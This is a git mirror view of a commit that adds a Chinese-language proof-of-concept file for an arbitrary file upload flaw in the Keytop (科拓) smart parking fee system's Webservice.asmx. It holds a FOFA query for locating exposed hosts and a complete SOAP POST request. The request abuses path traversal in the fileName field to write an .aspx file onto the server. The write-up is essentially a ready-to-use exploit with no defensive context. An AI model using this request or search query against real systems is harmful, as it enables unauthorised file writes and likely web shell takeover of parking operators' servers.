mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 科拓全智能停车收费系统Webservice.asmx存在任意文件上传.md
This commit is contained in:
parent
2789960927
commit
73e2689fce
28
科拓全智能停车收费系统Webservice.asmx存在任意文件上传.md
Normal file
28
科拓全智能停车收费系统Webservice.asmx存在任意文件上传.md
Normal file
@ -0,0 +1,28 @@
|
|||||||
|
## 科拓全智能停车收费系统Webservice.asmx存在任意文件上传
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
body="/KT_Css/qd_defaul.css"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /Webservice.asmx HTTP/1.1
|
||||||
|
Host: ip
|
||||||
|
Content-Type: text/xml; charset=utf-8
|
||||||
|
Content-Length: 455
|
||||||
|
SOAPAction: "http://tempuri.org/UploadResume"
|
||||||
|
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
|
||||||
|
<soap:Body>
|
||||||
|
<UploadResume xmlns="http://tempuri.org/">
|
||||||
|
<ip>1</ip>
|
||||||
|
<fileName>../../../../test7.aspx</fileName>
|
||||||
|
<fileFlow>dGVzdA==</fileFlow>
|
||||||
|
<tag>3</tag>
|
||||||
|
</UploadResume>
|
||||||
|
</soap:Body>
|
||||||
|
</soap:Envelope>
|
||||||
|
```
|
||||||
|

|
||||||
Loading…
x
Reference in New Issue
Block a user